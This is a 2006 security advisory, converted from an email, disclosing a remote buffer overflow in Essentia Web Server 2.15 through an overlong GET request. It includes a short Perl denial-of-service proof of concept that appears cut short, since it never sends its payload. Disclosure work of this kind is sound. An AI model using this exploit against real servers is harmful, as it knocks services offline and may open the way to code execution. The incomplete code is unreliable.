<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7651.51">
<TITLE>[x0n3-h4ck.org] Essentia Web Server 2.15 Buffer Overflow</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>-=[--------------------ADVISORY-------------------]=-<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Essentia Web Server&nbsp; V 2.15<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Author:CorryL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; x0n3-h4ck.org<BR>
-=[----------------------------------------------------]=-<BR>
<BR>
<BR>
-=[+] Application:&nbsp;&nbsp;&nbsp; Essentia Web Server<BR>
-=[+] Version:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2.15<BR>
-=[+] Vendor's URL:&nbsp;&nbsp; <A HREF="http://www.essencomp.com">http://www.essencomp.com</A><BR>
-=[+] Platform:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Windows<BR>
-=[+] Bug type:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Buffer overflow<BR>
-=[+] Exploitation:&nbsp;&nbsp; Remote<BR>
-=[-]<BR>
-=[+] Author:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; CorryL&nbsp; ~ corryl80[at]gmail[dot]com ~<BR>
-=[+] Reference:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; www.x0n3-h4ck.org<BR>
-=[+] Virtual Office: <A HREF="http://www.kasamba.com/CorryL">http://www.kasamba.com/CorryL</A><BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers.<BR>
<BR>
..::[ Bug ]::..<BR>
<BR>
This software is affection from a buffer overflow<BR>
what it would allow an attacker to perform arbitrary code<BR>
on the system victim.<BR>
Sending a GET+Ax6800 request, he would succeed<BR>
to write above the seh point.<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
#!/usr/bin/perl<BR>
<BR>
<BR>
use IO::Socket;<BR>
<BR>
use Getopt::Std; getopts('h:', \%args);<BR>
<BR>
<BR>
<BR>
if (defined($args{'h'})) { $host = $args{'h'}; }<BR>
<BR>
print STDERR &quot;\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n&quot;;<BR>
<BR>
print STDERR &quot;-=[ Discovered By CorryL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; corryl80@gmail.com ]=-\n&quot;;<BR>
<BR>
print STDERR &quot;-=[ Coded by CorryL&nbsp;&nbsp;&nbsp;&nbsp; info:www.x0n3-h4ck.org ]=-\n\n&quot;;<BR>
<BR>
if (!defined($host)) {<BR>
<BR>
Usage();<BR>
<BR>
}<BR>
<BR>
$dos = &quot;A&quot;x6800;<BR>
<BR>
print &quot;[+] Connect to $host\n&quot;;<BR>
<BR>
$socket = new IO::Socket::INET (PeerAddr =&gt; &quot;$host&quot;,<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; PeerPort =&gt; 80,<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Proto =&gt; 'tcp');<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; die unless $socket;<BR>
<BR>
print &quot;[+] Sending DOS byte\n&quot;;<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $data = &quot;GET /$dos \r\n\r\n&quot;;<BR>
<BR>
<BR>
..::[ Workaround ]::..<BR>
<BR>
nothing<BR>
<BR>
..::[ Disclousure Timeline ]::..<BR>
<BR>
[30/10/2006] - Vendor notification<BR>
[04/11/2006] &#150; No Vendor Response<BR>
[04/11/2006] - Public disclousure<BR>
<BR>
<BR>
<BR>
<BR>
*********************<BR>
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!<BR>
Per maggiori informazioni vai su: <A HREF="http://adsl.alice.it/servizi/alicebasic.html">http://adsl.alice.it/servizi/alicebasic.html</A> </FONT>
</P>

</BODY>
</HTML>